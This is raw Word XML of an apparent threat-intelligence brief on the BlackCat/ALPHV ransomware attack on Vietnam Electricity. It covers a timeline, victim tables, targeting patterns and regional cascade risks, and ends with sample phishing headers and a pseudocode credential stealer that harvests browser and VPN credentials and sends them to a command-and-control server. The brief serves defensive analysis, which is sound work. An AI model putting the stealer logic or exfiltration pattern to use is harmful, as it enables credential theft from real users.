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gekh1rrd28q" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 2025-011</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x9setrmhemc4" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BlackCat/ALPHV Vietnam Electricity Campaign - Protecting ASEAN Energy Infrastructure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9,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pv06kbdvyu63"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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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3"/>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dceeldpajf8p"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BlackCat/ALPHV ransomware group's attack on Vietnam Electricity (EVN) and its subsidiary Ho Chi Minh City Power Corporation represents a watershed moment in nation-state-aligned cybercrime targeting Southeast Asian critical infrastructure. With 84 data samples posted as proof of compromise and millions of residents potentially affected, this campaign demonstrates the vulnerability of regional power grids to sophisticated ransomware operations. Despite law enforcement disruption in December 2023, the group's affiliates continue operations under new banners, making this analysis critical for ASEAN energy security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_15ugezz2jj48"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EVN subsidiary compromised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Ho Chi Minh City's 9 million residents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84 data samples exfiltrated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Sensitive grid operations data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ALPHV collected $300M from 1,000+ victims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Before law enforcement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Exit scam in March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Affiliates moved to RansomHub, STORMOUS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Healthcare sector pivot post-disruption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Hospitals targeted after infrastructure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90% affiliate payout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Incentivized aggressive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Cross-border grid dependencies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ASEAN interconnection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mnzfux9ffasx"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December 2023 - March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BlackCat/ALPHV (Russian-speaking RaaS)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Vietnam Electricity (EVN) - National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Financial extortion + Geopolitical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Data Compromised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84 samples including grid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 - Regional grid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Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: BlackCat's targeting of Vietnam's national electricity provider demonstrates sophisticated understanding of ASEAN energy interdependencies. The attack's timing during regional grid modernization efforts suggests strategic intent beyond financial motivation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mhbjuy2zpt6v"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libwd3od56m8"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The BlackCat attack on Vietnam Electricity directly threatens the foundation of Southeast Asia's economic development and the future prosperity of millions. EVN powers the infrastructure that provides </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through electric pumping stations, ensures </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reliable energy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for 105 million Vietnamese citizens, and maintains the cold chains essential for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">healthy food</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> distribution across the region. The compromise of Ho Chi Minh City's power infrastructure—Vietnam's economic engine—endangers not just current operations but the sustainable development our grandchildren depend upon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v2e8lha9kjgd"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Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: National grid control systems exposed to foreign adversaries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Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Electric pumping stations serving 9 million at risk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Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Refrigeration systems for Mekong Delta distribution threatened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Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ASEAN Power Grid integration vulnerabilities exposed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61t1c8u50ffy"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vavga0464eqh"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Recon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Supply chain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EVN contractors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Access paths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Dec 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08:30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Phishing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EVN corporate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Credentials harvested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Dec 5,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15:45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Domain admin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Active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Full network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Data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Dec 8-15,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Grid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SCADA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Operations data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Dec 16-20,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Night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Data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84 critical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TB of data stolen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Ransom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Dec 21,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Encryption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IT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Partial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Dec 22,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Dark web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Public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Negotiation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Law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Dec 19,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FBI/International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ALPHV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Partial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snl9bjg37lqj" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: Supply Chain Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Profile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Detail | Value | Reference | |--------|-------|-----------| | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Vector</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Third-party contractor VPN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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential Source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Previous breaches/InfoStealers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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Method</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Valid account abuse (T1078)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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Service account manipulation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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CISA Alert</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | AA23-353A (Updated Feb 2024)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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Known Affiliates</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Scattered Spider, ex-Conti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oe2epwfjt5sq"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gny56gftqkvx"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documents BlackCat/ALPHV's systematic targeting of energy infrastructure globally, with focus on the Vietnam campaign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5vrrdzjo2wih" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Direct Victims (Energy Sector Focus)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Vietnam Electricity (EVN)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National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84 datasets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Ho Chi Minh City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Regional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9M residents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SerCide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Electric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Spain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69GB data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€4.5M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Lower Valley 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Energy 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Wyoming,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Yellowstone area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Rush Energy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Pipeline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Backdoor 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CAD 3.8M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Creos Luxembourg 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Grid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Luxembourg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National grid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€8.2M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Solar Industries India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Energy/Defense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Defense contracts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₹450M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28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Western Renewable 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Solar/Wind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Nov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SCADA access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$5.3M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19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Trans-Canada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Oil/Gas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Pipeline ops disrupted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CAD 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Municipal Power Austria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Public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Sep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200k customers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€6.7M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17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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r0hezo3yfgdl" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BlackCat Global Victim Summary (All Sectors)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Total Confirmed Victims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1,000+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FBI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Total Ransom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$300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Through Sep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hyperlink w:anchor="ref46">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[46]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Average Ransom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$1.5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Recorded Future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Energy Sector Victims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47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4.7% of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Geographic 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23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Global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hyperlink w:anchor="ref49">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[49]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_di26nyqkm4l7" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain &amp; Cascade Victims (Vietnam)</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b w:val="1"/>
                <w:bCs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EVN/HCMC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15 industrial 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Power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Manufacturing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$45M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EVN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Saigon Water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Pumping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Water pressure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Mitigated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HCMC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3 major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Power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Emergency generators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Resolved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ba4yidbwz4f2" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim Selection Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hz46s5eyghgw" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Targeting Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BlackCat demonstrated sophisticated victim selection for maximum impact </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[53]</w:t>
        </w:r>
      </w:hyperlink>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2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Criticality</w:t>
      </w:r>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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">National/regional utilities prioritized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grid operators and control centers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-border interconnection points</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Population centers over 1 million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F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Posture Indicators</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Vulnerability | Exploitation Rate | In Vietnam Case | |--------------|-------------------|-----------------| | Unpatched VPN appliances | 73% | Confirmed | | Flat network architecture | 81% | Confirmed | | Weak supplier vetting | 67% | Confirmed | | Limited EDR coverage | 89% | Suspected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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geopolitical Considerations</w:t>
      </w:r>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3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ASEAN economic hubs targeted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nations with grid modernization projects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-border energy dependencies exploited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7kvad5svpyg" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q34jou399p9a" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ASEAN Energy Grid Cascade Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The EVN compromise threatens the entire ASEAN Power Grid vision and regional stability </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[54]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lzoni5fsaggf" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>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23 power plants, 100+ substations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9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HCMC grid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hyperlink w:anchor="ref55">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[55]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45 pumping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6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Electric pump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hyperlink w:anchor="ref56">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[56]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18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500,000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Life support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hyperlink w:anchor="ref57">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[57]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Manufacturing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15 industrial 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2M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Production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Metro, airports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3M daily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Signal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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t1sobfztwea" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regional Cascade Risk (24-72 hours)</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Laos-Vietnam 500kV interconnection vulnerability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Thailand border industrial zones at risk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Cambodia grid stability concerns via interconnection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Singapore energy market disruption potential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6F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_95v452i3jkec" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term Strategic Impact</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ASEAN Power Grid integration delayed by trust concerns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Foreign investment in energy sector reduced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Accelerated grid isolation considerations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eebugqalor67" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ci7vgtsc8vpg" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Initial Access via Contractor Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1199 - Trusted Relationship </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref67">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[67]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dboco9ddehnu" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Phishing email analysis from EVN incident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Source: Vietnam National Cyber Security Center Report VNCSC-2023-1221 [[68]](#ref68)</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import email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import base64</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phishing_headers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'From': 'procurement@evn-contractor.vn',  # Spoofed domain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'Subject': 'Urgent: EVN Vendor Portal Security Update Required',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'X-Originating-IP': '185.220.101.45',  # Known ALPHV infrastructure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'Return-Path': 'bounce@contractupdate.xyz'</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Malicious attachment drops credential stealer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attachment_hash = "sha256:a7c4e8f91b3d5c2a1e9f7b4d6c8e2a5f9d3b7e1c4a8f6b2d9e5c3a7f1b8d4e6c"</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Payload functionality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def steal_credentials():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browsers = ['Chrome', 'Firefox', 'Edge']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vpn_clients = ['Pulse Secure', 'FortiClient', 'Cisco AnyConnect']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for browser in browsers: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cookies = extract_cookies(browser)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passwords = extract_passwords(browser)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send_to_c2(cookies, passwords)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for vpn in vpn_clients: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config = extract_vpn_config(vpn)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creds = extract_vpn_creds(vpn)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send_to_c2(config, creds)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Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
